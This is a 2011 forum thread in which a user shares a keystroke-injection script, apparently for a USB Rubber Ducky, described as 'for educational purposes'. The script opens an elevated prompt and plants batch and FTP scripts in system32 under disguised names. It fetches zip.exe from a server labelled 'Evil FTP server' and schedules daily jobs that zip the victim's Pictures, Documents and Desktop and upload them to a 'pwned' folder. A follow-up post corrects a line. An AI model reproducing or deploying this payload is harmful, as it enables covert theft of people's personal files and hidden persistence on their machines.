Null Z3r0 Posted November 1, 2011 Share Posted November 1, 2011 Here is my first script for educational purposes ;-) It zips up the entire contents of a users Pictures Documents and Desktop and uploads it to your FTP server on a scheduled basis. Feel free to add some functionality or to change things a round a bit: REM Author: /\/u!! Z3r0 REM Platform: Windows 7 REM Description: Schedules a backup of Pictures, My Documents, and Desktop REM Zips Directory and Subdirectories into KB1337XXXXXXXX.log (X = date and time) REM .log file is schedule to be uploaded every 24 hours (change the file extension back to .zip to open) REM Download zip.exe and place on FTP server (allows recursive directory delivery) http://stahlworks.com/dev/zip.exe ESCAPE CONTROL ESCAPE DELAY 50 STRING cmd DELAY 200 MENU DELAY 200 STRING a ENTER DELAY 800 LEFT DELAY 200 ENTER DELAY 600 ENTER DELAY 50 STRING cd %systemroot%\system32 ENTER REM Clean up for fresh exploit STRING del himem.bak ENTER DELAY 100 STRING del datetime.bat ENTER DELAY 100 REM Create symbolic link to user's profile directory as c:\ STRING mklink /d \Docs %userprofile% ENTER DELAY 50 STRING mkdir \temp3 ENTER DELAY 150 REM Create batch file to create zip file with date time file format STRING copy con datetime.bat ENTER DELAY 150 STRING set _my_datetime=%date%_%time% ENTER DELAY 50 STRING set _my_datetime=%_my_datetime: =_% ENTER DELAY 50 STRING set _my_datetime=%_my_datetime::=% ENTER DELAY 50 STRING set _my_datetime=%_my_datetime:/=_% ENTER DELAY 50 STRING set _my_datetime=%_my_datetime:.=_% ENTER DELAY 50 REM Deletes old zip files before creating new up and placing it into c:\temp3 STRING del /F /S /Q /A \temp3\*.* ENTER DELAY 50 STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents DELAY 50 STRING END ENTER DELAY 50 STRING exit ENTER DELAY 50 CTRL z ENTER DELAY 50 REM FTP script for automated upload STRING copy con himem.bak ENTER DELAY 50 REM FTP Username STRING FTPuser ENTER DELAY 50 REM FTP PASSWORD STRING FTPpasswd ENTER DELAY 50 STRING bin ENTER DELAY 50 STRING prompt ENTER DELAY 50 STRING lcd \temp3 ENTER DELAY 50 STRING mkdir pwned ENTER STRING cd pwned ENTER STRING mput * ENTER DELAY 50 STRING quit ENTER DELAY 50 CTRL z ENTER DELAY 50 REM IP of Evil FTP server with zip.exe STRING ftp 192.168.1.18 ENTER DELAY 50 STRING cisco ENTER DELAY 50 STRING cisco ENTER DELAY 50 STRING bin ENTER DELAY 50 STRING prompt ENTER DELAY 50 REM Get ZIP.exe and put it into system32 STRING get zip.exe ENTER DELAY 100 STRING quit ENTER DELAY 50 ENTER REM Start Task Scheduler STRING net start ENTER DELAY 50 STRING net start "task scheduler" ENTER DELAY 50 REM Schedule upload to IP of Evil FTP server to dump captured data STRING at 23:50 /every:M,T,W,Th,F,S,Su %systemroot%\system32\ftp.exe -s:%systemroot%\system32\himem.bak 192.168.1.18 ENTER DELAY 50 STRING at 23:48 /every:M,T,W,Th,F,S,Su cmd /c %systemroot%\system32\datetime.bat ENTER DELAY 50 STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
Null Z3r0 Posted November 1, 2011 Author Share Posted November 1, 2011 Minor edit. Add ENTER under second delay: From: DELAY 50 STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents DELAY 50 STRING END ENTER to: DELAY 50 STRING zip -r c:\temp3\KB1337_%_my_datetime%.log c:\Docs\Pictures c:\Docs\Desktop c:\Docs\Documents DELAY 50 ENTER STRING END ENTER Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.